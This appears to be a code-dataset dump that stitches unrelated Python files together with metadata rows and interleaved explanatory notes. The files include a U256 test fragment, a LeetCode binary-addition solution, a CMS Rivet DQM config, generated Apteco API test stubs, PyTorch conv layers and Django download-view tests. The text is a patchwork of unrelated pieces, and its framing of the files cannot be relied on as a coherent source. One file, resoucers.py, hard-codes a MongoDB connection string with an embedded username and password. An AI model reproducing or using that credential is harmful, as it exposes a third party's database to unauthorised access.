assert U256(U256_MAX_VALUE) >> 257 == 0
assert U256(0) >> 20 == 0
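The pattern these tests exercise throughout is consistent: reject negative or out-of-range operands with `ValueError`, reject non-int constructor arguments with `TypeError`, and let float operands fall through to plain float arithmetic. A hypothetical minimal class sketching that contract for addition only; the real `Uint`/`U256` live in `ethereum.base_types`:

```python
class MiniUint(int):
    """Hypothetical minimal unsigned int with checked addition."""

    def __new__(cls, value):
        # bool is an int subclass, so exclude it explicitly.
        if isinstance(value, bool) or not isinstance(value, int):
            raise TypeError("value must be an int")
        if value < 0:
            raise ValueError("value must be non-negative")
        return super().__new__(cls, value)

    def __add__(self, other):
        if isinstance(other, float):
            # Float operands degrade to plain float arithmetic.
            return int(self) + other
        if other < 0:
            raise ValueError("negative operand")
        return MiniUint(int(self) + other)

    # Because MiniUint subclasses int, Python tries the reflected method
    # first for `4 + MiniUint(5)`, so the same checks apply there too.
    __radd__ = __add__


assert MiniUint(5) + 4 == 9 and isinstance(MiniUint(5) + 4, MiniUint)
assert MiniUint(5) + 1.0 == 6.0 and isinstance(MiniUint(5) + 1.0, float)
```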
# File: Dataset/Leetcode/test/67/588.py | repo: kkcookies99/UAST @ fff8188 | license: MIT
class Solution:
def XXX(self, a: str, b: str) -> str:
        # return bin(int(a, 2) + int(b, 2))[2:]
        return '{:b}'.format(int(a, 2) + int(b, 2))
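The one-liner above adds two binary strings by round-tripping through `int`: parse each operand in base 2, add, and format the sum back with the `b` format spec. A quick standalone check (the wrapper name is hypothetical):

```python
def add_binary(a: str, b: str) -> str:
    # Parse base-2 strings, add as ints, format back to binary.
    return '{:b}'.format(int(a, 2) + int(b, 2))

print(add_binary("11", "1"))       # 100
print(add_binary("1010", "1011"))  # 10101
```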
# File: GeneratorInterface/RivetInterface/python/PostProcessor_cff.py | repo: ckamtsikis/cmssw @ ea19fe6 | license: Apache-2.0
import FWCore.ParameterSet.Config as cms
from DQMServices.Core.DQMEDHarvester import DQMEDHarvester
###################
#CMS_2011_S8968497
###################
postCMS_2011_S8968497 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8968497"),
efficiency = cms.vstring(""),
resolution = cms.vstring(""),
normalizationToIntegral = cms.untracked.vstring("d01-x01-y01",
"d02-x01-y01",
"d03-x01-y01",
"d04-x01-y01",
"d05-x01-y01",
"d06-x01-y01",
"d07-x01-y01",
"d08-x01-y01",
"d09-x01-y01")
)
###################
#CMS_2010_S8547297
###################
postCMS_2010_S8547297 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2010_S8547297"),
scaleBy = cms.untracked.vstring(
"d01-x01-y01 2.5",
"d01-x01-y02 2.5",
"d01-x01-y03 2.5",
"d01-x01-y04 2.5",
"d02-x01-y01 2.5",
"d02-x01-y02 2.5",
"d02-x01-y03 2.5",
"d02-x01-y04 2.5",
"d03-x01-y01 2.5",
"d03-x01-y02 2.5",
"d03-x01-y03 2.5",
"d03-x01-y04 2.5",
"d04-x01-y01 2.5",
"d04-x01-y02 2.5",
"d04-x01-y03 2.5",
"d04-x01-y04 2.5",
"d05-x01-y01 2.5",
"d05-x01-y02 2.5",
"d05-x01-y03 2.5",
"d05-x01-y04 2.5",
"d06-x01-y01 2.5",
"d06-x01-y02 2.5",
"d06-x01-y03 2.5",
"d06-x01-y04 2.5",
"d07-x01-y01 0.0331572798065",
"d07-x01-y02 0.0331572798065"
),
normalizationToIntegral = cms.untracked.vstring(
"d01-x01-y01 nEvt",
"d01-x01-y02 nEvt",
"d01-x01-y03 nEvt",
"d01-x01-y04 nEvt",
"d02-x01-y01 nEvt",
"d02-x01-y02 nEvt",
"d02-x01-y03 nEvt",
"d02-x01-y04 nEvt",
"d03-x01-y01 nEvt",
"d03-x01-y02 nEvt",
"d03-x01-y03 nEvt",
"d03-x01-y04 nEvt",
"d04-x01-y01 nEvt",
"d04-x01-y02 nEvt",
"d04-x01-y03 nEvt",
"d04-x01-y04 nEvt",
"d05-x01-y01 nEvt",
"d05-x01-y02 nEvt",
"d05-x01-y03 nEvt",
"d05-x01-y04 nEvt",
"d06-x01-y01 nEvt",
"d06-x01-y02 nEvt",
"d06-x01-y03 nEvt",
"d06-x01-y04 nEvt",
"d07-x01-y01 nEvt",
"d07-x01-y02 nEvt",
"d08-x01-y01 nEvt",
"d08-x01-y02 nEvt"
)
)
###################
#CMS_2010_S8656010
###################
postCMS_2010_S8656010 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2010_S8656010"),
scaleBy = cms.untracked.vstring(
"d01-x01-y01 2.5",
"d01-x01-y02 2.5",
"d01-x01-y03 2.5",
"d01-x01-y04 2.5",
"d02-x01-y01 2.5",
"d02-x01-y02 2.5",
"d02-x01-y03 2.5",
"d02-x01-y04 2.5",
"d03-x01-y01 2.5",
"d03-x01-y02 2.5",
"d03-x01-y03 2.5",
"d03-x01-y04 2.5",
"d04-x01-y01 2.5",
"d04-x01-y02 2.5",
"d04-x01-y03 2.5",
"d04-x01-y04 2.5",
"d05-x01-y01 2.5",
"d05-x01-y02 2.5",
"d05-x01-y03 2.5",
"d05-x01-y04 2.5",
"d06-x01-y01 2.5",
"d06-x01-y02 2.5",
"d06-x01-y03 2.5",
"d06-x01-y04 2.5",
"d07-x01-y01 0.0331572798065",
"d07-x01-y02 0.0331572798065"
),
normalizationToIntegral = cms.untracked.vstring(
"d01-x01-y01 nEvt",
"d01-x01-y02 nEvt",
"d01-x01-y03 nEvt",
"d01-x01-y04 nEvt",
"d02-x01-y01 nEvt",
"d02-x01-y02 nEvt",
"d02-x01-y03 nEvt",
"d02-x01-y04 nEvt",
"d03-x01-y01 nEvt",
"d03-x01-y02 nEvt",
"d03-x01-y03 nEvt",
"d03-x01-y04 nEvt",
"d04-x01-y01 nEvt",
"d04-x01-y02 nEvt",
"d04-x01-y03 nEvt",
"d04-x01-y04 nEvt",
"d05-x01-y01 nEvt",
"d05-x01-y02 nEvt",
"d05-x01-y03 nEvt",
"d05-x01-y04 nEvt",
"d06-x01-y01 nEvt",
"d06-x01-y02 nEvt",
"d06-x01-y03 nEvt",
"d06-x01-y04 nEvt",
"d07-x01-y01 nEvt",
"d07-x01-y02 nEvt",
"d08-x01-y01 nEvt",
"d08-x01-y02 nEvt"
)
)
###################
#CMS_2011_S8884919
###################
postCMS_2011_S8884919 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8884919"),
normalizeToIntegral = cms.untracked.vstring(
"d01-x01-y01",
"d02-x01-y01",
"d03-x01-y01",
"d04-x01-y01",
"d05-x01-y01",
"d06-x01-y01",
"d07-x01-y01",
"d08-x01-y01",
"d09-x01-y01",
"d10-x01-y01",
"d11-x01-y01",
"d12-x01-y01",
"d13-x01-y01",
"d14-x01-y01",
"d15-x01-y01",
"d16-x01-y01",
"d17-x01-y01",
"d17-x01-y02",
"d18-x01-y01",
"d18-x01-y02",
"d19-x01-y01",
"d19-x01-y02",
"d20-x01-y01",
"d21-x01-y01",
"d22-x01-y01",
"d23-x01-y01",
"d24-x01-y01",
"d25-x01-y01"
)
)
###################
#CMS_2011_S8941262
###################
postCMS_2011_S8941262 = cms.EDAnalyzer("DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8941262"),
xsection = cms.untracked.double(1000),
normalizeToLumi = cms.untracked.vstring(
"d01-x01-y01",
"d02-x01-y01",
"d03-x01-y01"
),
scaleBy = cms.untracked.vstring(
"d01-x01-y01 0.000001", #norm from picobarn to microbarn
"d02-x01-y01 0.001", #norm from picobarn to nanobarn
"d03-x01-y01 0.001" #norm from picobarn to nanobarn
)
)
###################
#CMS_2011_S8950903
###################
postCMS_2011_S8950903 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8950903"),
normalizeToIntegral = cms.untracked.vstring(
"d01-x01-y01"
)
)
###################
#CMS_2011_S8957746
###################
postCMS_2011_S8957746 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8957746"),
normalizeToIntegral = cms.untracked.vstring(
"d01-x01-y01",
"d01-x02-y01",
"d01-x03-y01",
"d02-x01-y01",
"d02-x02-y01",
"d02-x03-y01"
)
)
###################
#CMS_2011_S8968497
###################
postCMS_2011_S8968497 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S8968497"),
normalizeToIntegral = cms.untracked.vstring(
"d01-x01-y01"
)
)
###################
#CMS_2011_S9086218
###################
postCMS_2011_S9086218 = cms.EDAnalyzer(
"DQMRivetClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S9086218"),
xsection = cms.untracked.double(1000),
normalizeToLumi = cms.untracked.vstring(
"d01-x01-y01 nEvt"
),
scaleBy = cms.untracked.vstring(
"d01-x01-y01 0.5"
)
)
###################
#CMS_2011_S9088458
###################
postCMSo2011oS9088458 = DQMEDHarvester(
"DQMGenericClient",
subDirs = cms.untracked.vstring("Rivet/CMS_2011_S9088458"),
efficiencyProfile = cms.untracked.vstring("d01-x01-y01 d01-x01-y01 trijet dijet"),
resolution = cms.vstring(""),
efficiency = cms.vstring("")
)
####SEQUENCES
RivetDQMPostProcessor = cms.Sequence( postCMS_2011_S8968497 +
postCMS_2010_S8547297 +
postCMS_2010_S8656010 +
postCMS_2011_S8884919 +
postCMS_2011_S8941262 +
postCMS_2011_S8950903 +
postCMS_2011_S8957746 +
postCMS_2011_S8968497 +
postCMS_2011_S9086218 +
postCMSo2011oS9088458 )
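The `scaleBy` factors in `postCMS_2011_S8941262` above convert cross-sections from picobarn; the unit arithmetic can be spot-checked with a plain-Python sketch (not part of the config):

```python
# 1 microbarn = 1e6 picobarn and 1 nanobarn = 1e3 picobarn,
# so a value in pb is converted by multiplying with the reciprocal.
PB_PER_UB = 1e6
PB_PER_NB = 1e3

print(1 / PB_PER_UB)  # → 1e-06, the d01-x01-y01 factor
print(1 / PB_PER_NB)  # → 0.001, the d02/d03 factor
```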
| 43.006309 | 98 | 0.29722 | 964 | 13,633 | 4.124481 | 0.092324 | 0.117706 | 0.114688 | 0.077465 | 0.739437 | 0.739437 | 0.739437 | 0.697938 | 0.679829 | 0.634557 | 0 | 0.285178 | 0.589745 | 13,633 | 316 | 99 | 43.142405 | 0.425711 | 0.020025 | 0 | 0.662551 | 0 | 0 | 0.211773 | 0.017744 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.00823 | 0 | 0.00823 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3ba750f7a40fbb16c701a2abec0c59c8dc28c95f | 19 | py | Python | version.py | Vincysuper07/TitleDBheroku | f93e24700913dac4348e3d704a88df1fd0df64ce | [
"Unlicense"
] | 35 | 2016-09-15T18:43:18.000Z | 2021-11-12T23:15:54.000Z | version.py | Vincysuper07/TitleDBheroku | f93e24700913dac4348e3d704a88df1fd0df64ce | [
"Unlicense"
] | 33 | 2016-11-11T22:01:21.000Z | 2020-07-05T07:11:35.000Z | version.py | Vincysuper07/TitleDBheroku | f93e24700913dac4348e3d704a88df1fd0df64ce | [
"Unlicense"
] | 16 | 2017-01-17T03:27:58.000Z | 2021-11-12T23:15:58.000Z | __version__ = "0.9.14"
| 9.5 | 18 | 0.789474 | 4 | 19 | 2.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 0.052632 | 19 | 1 | 19 | 19 | 0.388889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3bdaa9bbc7fd681ccfc56c1b76dffced3d2ff4c0 | 186 | py | Python | resoucers.py | julianaoliveira0712/Moments | 4aa68067148703491133f6825e766a100ec8f86d | [
"MIT"
] | null | null | null | resoucers.py | julianaoliveira0712/Moments | 4aa68067148703491133f6825e766a100ec8f86d | [
"MIT"
] | null | null | null | resoucers.py | julianaoliveira0712/Moments | 4aa68067148703491133f6825e766a100ec8f86d | [
"MIT"
] | null | null | null | import pymongo
client = pymongo.MongoClient("mongodb+srv://remember_auth:hRmXnjYiziGTz3DP@cluster0-d2d9w.azure.mongodb.net/test?retryWrites=true&w=majority")
db = client["remember-dev"] | 46.5 | 142 | 0.811828 | 24 | 186 | 6.25 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022472 | 0.043011 | 186 | 4 | 143 | 46.5 | 0.820225 | 0 | 0 | 0 | 0 | 0.333333 | 0.652406 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ce19c99d5519a63c713bb773883abbed76bdf197 | 9,111 | py | Python | test/test_audiences_api.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | 2 | 2020-05-21T14:24:16.000Z | 2020-12-03T19:56:34.000Z | test/test_audiences_api.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | null | null | null | test/test_audiences_api.py | Apteco/apteco-api | 7440c98ab10ea6d8a5997187f6fc739ce1c75d2b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Apteco API
An API to allow access to Apteco Marketing Suite resources # noqa: E501
The version of the OpenAPI document: v2
Contact: support@apteco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import apteco_api
from apteco_api.api.audiences_api import AudiencesApi # noqa: E501
from apteco_api.rest import ApiException
class TestAudiencesApi(unittest.TestCase):
"""AudiencesApi unit test stubs"""
def setUp(self):
self.api = apteco_api.api.audiences_api.AudiencesApi() # noqa: E501
def tearDown(self):
pass
def test_audiences_calculate_audience_data_licensing_sync(self):
"""Test case for audiences_calculate_audience_data_licensing_sync
Get data licensing information for the latest version of this audience # noqa: E501
"""
pass
def test_audiences_calculate_audience_latest_update_sync(self):
"""Test case for audiences_calculate_audience_latest_update_sync
Calculate counts against the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to produce the end result # noqa: E501
"""
pass
def test_audiences_cancel_calculate_audience_data_licensing_job(self):
"""Test case for audiences_cancel_calculate_audience_data_licensing_job
Cancel a running data licensing job # noqa: E501
"""
pass
def test_audiences_cancel_calculate_audience_job(self):
"""Test case for audiences_cancel_calculate_audience_job
Cancel a running calculate job # noqa: E501
"""
pass
def test_audiences_cancel_check_audience_job(self):
"""Test case for audiences_cancel_check_audience_job
Cancel a running check job # noqa: E501
"""
pass
def test_audiences_cancel_export_audience_job(self):
"""Test case for audiences_cancel_export_audience_job
Cancel a running export job # noqa: E501
"""
pass
def test_audiences_check_audience_latest_update_sync(self):
"""Test case for audiences_check_audience_latest_update_sync
Calculate check statistics against the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to identify the data to analyse and the specified dimensions will be used to perform the analysis. # noqa: E501
"""
pass
def test_audiences_create_audience(self):
"""Test case for audiences_create_audience
Creates a new audience from the given details for the logged in user. # noqa: E501
"""
pass
def test_audiences_create_audience_hit_for_audience(self):
"""Test case for audiences_create_audience_hit_for_audience
Register a hit (view) for the given audience # noqa: E501
"""
pass
def test_audiences_create_audience_update(self):
"""Test case for audiences_create_audience_update
Updates the details of a particular audience. If you don't have an id for the audience then POST to the /Audiences URL to create a new audience. # noqa: E501
"""
pass
def test_audiences_create_calculate_audience_data_licensing_job(self):
"""Test case for audiences_create_calculate_audience_data_licensing_job
Create a new job to get data licensing information for the latest version of this audience # noqa: E501
"""
pass
def test_audiences_create_calculate_audience_job_for_latest_update(self):
"""Test case for audiences_create_calculate_audience_job_for_latest_update
Create a new job to calculate counts against the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to produce the end result # noqa: E501
"""
pass
def test_audiences_create_check_audience_job_for_latest_update(self):
"""Test case for audiences_create_check_audience_job_for_latest_update
Create a new job to calculate check statistics against the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to identify the data to analyse and the specified dimensions will be used to perform the analysis. # noqa: E501
"""
pass
def test_audiences_create_export_audience_job_for_latest_update(self):
"""Test case for audiences_create_export_audience_job_for_latest_update
Create a new job to export data from the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to identify the data to export and the specified columns will be used to export the data, to a file and/or as a sample within the body of the result # noqa: E501
"""
pass
def test_audiences_delete_audience(self):
"""Test case for audiences_delete_audience
Deletes the specified audience # noqa: E501
"""
pass
def test_audiences_export_audience_latest_update_sync(self):
"""Test case for audiences_export_audience_latest_update_sync
Create a new job to export data from the FastStats system for the latest version of this audience. The different queries associated with the latest version of this audience will be combined to identify the data to export and the specified columns will be used to export the data, to a file and/or as a sample within the body of the result # noqa: E501
"""
pass
def test_audiences_get_audience(self):
"""Test case for audiences_get_audience
Returns the details of a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_hit_for_audience(self):
"""Test case for audiences_get_audience_hit_for_audience
Returns details for a given audience hit for this audience # noqa: E501
"""
pass
def test_audiences_get_audience_hits_for_audience(self):
"""Test case for audiences_get_audience_hits_for_audience
Returns a summary of the hits for this audience - i.e. information about when users have viewed the audience. # noqa: E501
"""
pass
def test_audiences_get_audience_latest_native_for_nett_query(self):
"""Test case for audiences_get_audience_latest_native_for_nett_query
Returns native XML (i.e. for use with other FastStats applications) for the Nett query of the latest update for a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_result(self):
"""Test case for audiences_get_audience_result
Returns details of a particular result for a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_results(self):
"""Test case for audiences_get_audience_results
Returns a summary of the results for a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_update(self):
"""Test case for audiences_get_audience_update
Returns details of an update for a particular audience # noqa: E501
"""
pass
def test_audiences_get_audience_updates(self):
"""Test case for audiences_get_audience_updates
Returns a summary of the updates to a particular audience # noqa: E501
"""
pass
def test_audiences_get_audiences(self):
"""Test case for audiences_get_audiences
Requires OrbitAdmin: Gets summary information about each audience in the DataView. # noqa: E501
"""
pass
def test_audiences_get_calculate_audience_data_licensing_job(self):
"""Test case for audiences_get_calculate_audience_data_licensing_job
Get the status of a running calculate job # noqa: E501
"""
pass
def test_audiences_get_calculate_audience_job(self):
"""Test case for audiences_get_calculate_audience_job
Get the status of a running calculate job # noqa: E501
"""
pass
def test_audiences_get_check_audience_job(self):
"""Test case for audiences_get_check_audience_job
Get the status of a running check job # noqa: E501
"""
pass
def test_audiences_get_export_audience_job(self):
"""Test case for audiences_get_export_audience_job
Get the status of a running export job # noqa: E501
"""
pass
def test_audiences_transfer_audience_ownership(self):
"""Test case for audiences_transfer_audience_ownership
Transfer ownership of an audience from the current user to a new owner # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 37.187755 | 363 | 0.712875 | 1,227 | 9,111 | 5.039935 | 0.121434 | 0.042691 | 0.053364 | 0.097025 | 0.811934 | 0.777652 | 0.727361 | 0.681113 | 0.578913 | 0.478008 | 0 | 0.01461 | 0.241247 | 9,111 | 244 | 364 | 37.340164 | 0.879936 | 0.60641 | 0 | 0.430556 | 0 | 0 | 0.002767 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.444444 | false | 0.430556 | 0.069444 | 0 | 0.527778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
ce3f2a32ea9ccd66abb009d29316a5b0bb74013e | 4,369 | py | Python | cmvc/models/layer.py | kjun1/CMVC | e4ba0f3cf45080e784502dc5f59fd97051c3c884 | [
"MIT"
] | null | null | null | cmvc/models/layer.py | kjun1/CMVC | e4ba0f3cf45080e784502dc5f59fd97051c3c884 | [
"MIT"
] | null | null | null | cmvc/models/layer.py | kjun1/CMVC | e4ba0f3cf45080e784502dc5f59fd97051c3c884 | [
"MIT"
] | null | null | null | import torch
from torch import nn
class CBGLayer(nn.Module):
"""
Conv+Bn+GLU
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride,
padding=0):
super().__init__()
self.conv1 = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.conv2 = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn1 = nn.BatchNorm2d(out_channels)
self.bn2 = nn.BatchNorm2d(out_channels)
def forward(self, x):
x1 = self.bn1(self.conv1(x))
x2 = self.bn2(self.conv2(x))
x = torch.cat((x1, x2), 1)
x = nn.functional.glu(x, 1)
return x
class CBLLayer(nn.Module):
"""
Conv+Bn+LReLU
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride,
padding=0):
super().__init__()
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn = nn.BatchNorm2d(out_channels)
self.lrelu = nn.LeakyReLU()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.lrelu(x)
return x
class DBGLayer(nn.Module):
"""
Deconv + Bn + GLU
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride,
padding=0):
super().__init__()
self.deconv1 = nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.deconv2 = nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn1 = nn.BatchNorm2d(out_channels)
self.bn2 = nn.BatchNorm2d(out_channels)
def forward(self, x):
x1 = self.bn1(self.deconv1(x))
x2 = self.bn2(self.deconv2(x))
x = torch.cat((x1, x2), 1)
x = nn.functional.glu(x, 1)
return x
class DBSLayer(nn.Module):
"""
Deconv + Bn + SoftPlus
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride,
padding=0):
super().__init__()
self.deconv = nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding)
self.bn = nn.BatchNorm2d(out_channels)
self.softplus = nn.Softplus()
def forward(self, x):
x = self.deconv(x)
x = self.bn(x)
x = self.softplus(x)
return x
class FlattenLayer(nn.Module):
"""
(N, C, H, W)を(N, C*H*W)にする
"""
def forward(self, x):
sizes = x.size()
return x.view(sizes[0], -1)
class ReshapeLayer(nn.Module):
"""
(N, C*H*W)を(N, C, H, W)にする
"""
def forward(self, x, out_channel):
sizes = x.size()
h = int((sizes[1] / out_channel)**0.5)
return x.view(sizes[0], out_channel, h, h)
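`ReshapeLayer` above infers a square spatial side from the flattened width; that arithmetic can be checked without torch (helper name and values below are illustrative only):

```python
# For a flattened tensor of shape (N, C*H*W) with H == W,
# ReshapeLayer recovers h = sqrt((C*H*W) / out_channel).
def infer_square_side(flat_width: int, out_channel: int) -> int:
    return int((flat_width / out_channel) ** 0.5)

# e.g. C=8, H=W=4 flattened to width 128, reshaped back with out_channel=8:
print(infer_square_side(128, 8))  # → 4
```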
| 29.126667 | 69 | 0.43328 | 417 | 4,369 | 4.326139 | 0.141487 | 0.134146 | 0.168514 | 0.116408 | 0.795455 | 0.761086 | 0.738914 | 0.723392 | 0.723392 | 0.723392 | 0 | 0.021739 | 0.473564 | 4,369 | 149 | 70 | 29.322148 | 0.762609 | 0.027466 | 0 | 0.728155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097087 | false | 0 | 0.019417 | 0 | 0.23301 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
65f84abc2c738544ec026e6dd2dac81a59f878a7 | 10,256 | py | Python | download_file/test/test_views.py | uktrade/fadmin2 | 0f774400fb816c9ca30e30b25ae542135966e185 | [
"MIT"
] | null | null | null | download_file/test/test_views.py | uktrade/fadmin2 | 0f774400fb816c9ca30e30b25ae542135966e185 | [
"MIT"
] | 6 | 2022-01-17T16:14:53.000Z | 2022-03-30T08:31:56.000Z | download_file/test/test_views.py | uktrade/fadmin2 | 0f774400fb816c9ca30e30b25ae542135966e185 | [
"MIT"
] | null | null | null | import io
from bs4 import BeautifulSoup
from django.contrib.auth.models import Permission
from django.urls import reverse
from openpyxl import load_workbook
from chartofaccountDIT.test.factories import (
NaturalCodeFactory,
ProgrammeCodeFactory,
ProjectCodeFactory,
)
from core.models import FinancialYear
from core.test.test_base import BaseTestCase
from core.utils.generic_helpers import (
get_current_financial_year,
get_financial_year_obj,
)
from costcentre.test.factories import CostCentreFactory
from forecast.models import (
BudgetMonthlyFigure,
FinancialCode,
FinancialPeriod,
ForecastMonthlyFigure,
)
class DownloadViewTests(BaseTestCase):
def setUp(self):
self.client.force_login(self.test_user)
self.cost_centre_code = 670911
self.cost_centre = CostCentreFactory(cost_centre_code=self.cost_centre_code,)
current_year = get_current_financial_year()
self.amount_apr = -234567
self.amount_may = 345216
self.programme_obj = ProgrammeCodeFactory()
nac_obj = NaturalCodeFactory()
project_obj = ProjectCodeFactory()
self.programme_code = project_obj.project_code
year_obj = FinancialYear.objects.get(financial_year=current_year)
# If you use the MonthlyFigureFactory the test fails.
# I cannot work out why, it may be due to using a random year....
financial_code_obj = FinancialCode.objects.create(
programme=self.programme_obj,
cost_centre=self.cost_centre,
natural_account_code=nac_obj,
project_code=project_obj,
)
        financial_code_obj.save()
apr_figure = ForecastMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=1),
financial_code=financial_code_obj,
financial_year=year_obj,
amount=self.amount_apr,
)
        apr_figure.save()
may_figure = ForecastMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=2,),
amount=self.amount_may,
financial_code=financial_code_obj,
financial_year=year_obj,
)
        may_figure.save()
self.year_total = self.amount_apr + self.amount_may
def test_download_mi_view(self):
assert not self.test_user.has_perm("forecast.can_download_mi_reports")
downloaded_files_url = reverse("download_mi_report",)
# Should have been redirected (no permission)
resp = self.client.get(downloaded_files_url, follow=False)
assert resp.status_code == 403
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
resp = self.client.get(downloaded_files_url)
# Should have been permission now
self.assertEqual(resp.status_code, 200)
def test_download_mi_report(self):
assert not self.test_user.has_perm("forecast.can_download_mi_reports")
downloaded_files_url = reverse(
"download_mi_report_source",
kwargs={"financial_year": get_current_financial_year()}
)
response = self.client.get(downloaded_files_url)
self.assertEqual(response.status_code, 302)
can_download_files = Permission.objects.get(codename="can_download_mi_reports",)
self.test_user.user_permissions.add(can_download_files)
self.test_user.save()
response = self.client.get(downloaded_files_url)
self.assertEqual(response.status_code, 200)
file = io.BytesIO(response.content)
wb = load_workbook(filename=file, read_only=True,)
ws = wb.active
self.assertEqual(ws["A1"].value, "Entity")
self.assertEqual(ws["A2"].value, "3000")
self.assertEqual(ws["I1"].value, "MAY")
self.assertEqual(ws["H2"].value, self.amount_apr / 100)
self.assertEqual(ws["I2"].value, self.amount_may / 100)
self.assertEqual(ws["W2"].value, self.year_total / 100)
wb.close()
class DownloadMIBudgetViewTests(BaseTestCase):
def setUp(self):
self.client.force_login(self.test_user)
self.cost_centre_code = 670911
cost_centre = CostCentreFactory(cost_centre_code=self.cost_centre_code,)
current_year = get_current_financial_year()
self.amount_apr = -234567
self.amount_may = 345216
self.programme_obj = ProgrammeCodeFactory()
nac_obj = NaturalCodeFactory()
project_obj = ProjectCodeFactory()
self.programme_code = project_obj.project_code
year_obj = FinancialYear.objects.get(financial_year=current_year)
# If you use the MonthlyFigureFactory the test fails.
# I cannot work out why, it may be due to using a random year....
financial_code_obj = FinancialCode.objects.create(
programme=self.programme_obj,
cost_centre=cost_centre,
natural_account_code=nac_obj,
project_code=project_obj,
)
        financial_code_obj.save()
apr_figure = BudgetMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=1),
financial_code=financial_code_obj,
financial_year=year_obj,
amount=self.amount_apr,
)
        apr_figure.save()
may_figure = BudgetMonthlyFigure.objects.create(
financial_period=FinancialPeriod.objects.get(financial_period_code=2,),
amount=self.amount_may,
financial_code=financial_code_obj,
financial_year=year_obj,
)
